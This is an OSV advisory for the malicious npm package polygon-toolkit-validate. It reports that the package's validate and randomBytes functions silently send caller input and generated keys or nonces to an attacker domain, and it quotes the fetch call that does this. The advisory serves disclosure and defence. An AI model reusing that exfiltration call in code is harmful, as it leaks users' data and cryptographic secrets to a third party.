MAL-2026-4642

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/polygon-toolkit-validate/MAL-2026-4642.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4642

Published

2026-05-21T01:31:55Z

Modified

2026-05-26T06:02:47.597626131Z

Summary

Malicious code in polygon-toolkit-validate (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c)

The package presents a Polygon/Polymarket validation/crypto utility but its exported APIs silently relay caller data to a hardcoded remote endpoint. In dist/index.js, validate(content) base64-encodes its argument and POSTs it to https://validator.polymarket.shop/v2 via checkvalidator (fetch("https://validator.polymarket.shop/v2",{method:"POST",...,body:JSON.stringify({action:"validator",content:btoa(t)})})). randomBytes(n) generates cryptographic bytes via crypto.randomBytes(n).toString('hex') and then passes that hex string through the same checkvalidator POST before returning it, so any caller using this as a drop-in for crypto.randomBytes leaks nonces/keys/IVs to the operator of polymarket.shop. The package name impersonates the Polygon/Polymarket ecosystems while the repository URL points to an unrelated 'serhiidemianov/validate-solana' project, consistent with namespace-abuse luring developers into a credential-leaking utility. Any code that imports and uses this package's advertised functions will silently transmit its inputs and generated cryptographic material off-host.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-003691",
            "versions": [
                "1.0.5"
            ],
            "sha256": "77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T01:31:55Z",
            "import_time": "2026-05-26T05:51:07.29953647Z"
        }
    ]
}

References

https://www.npmjs.com/package/polygon-toolkit-validate/v/1.0.5

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / polygon-toolkit-validate

Package

Name: polygon-toolkit-validate; View open source insights on deps.dev
Purl: pkg:npm/polygon-toolkit-validate

Affected ranges

Affected versions

1.*

1.0.5

Database specific

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "dist/index.js",
            "sha256": "2e2074f73f578a2b1ecfdb1e074ebd89c8ac45f2cb8127ed00102bf7bca5b6b6",
            "tlsh": "e1511fa33881d5710ff058f9607b8143f1f51e0ba104a995e2c9acaba0f8c8c52ba93d"
        },
        {
            "path": "package.json",
            "sha256": "bd81e92b9e8ac3bd6871a23ed55af8fe122278c7031028db8f1fcaf5949e6040",
            "tlsh": "7d019e34c874c6630bc412f55cb59653e5b2891f9408bc0832c6012c87cfbab04fc2dd"
        }
    ],
    "package_integrity": [
        {
            "filename": "polygon-toolkit-validate-1.0.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-sWjKNZZ3zo+ptHHCE35zfE/bP2JmaJ1cldivOSUukkRQvKZBQjCGPqgQR8E1/RTZVWL7ro9B+byR7DxP6DPYdA==",
                "sha1": "d156a775b6b0f29ced89b7ed07f037131c2e83e4"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/polygon-toolkit-validate/MAL-2026-4642.json"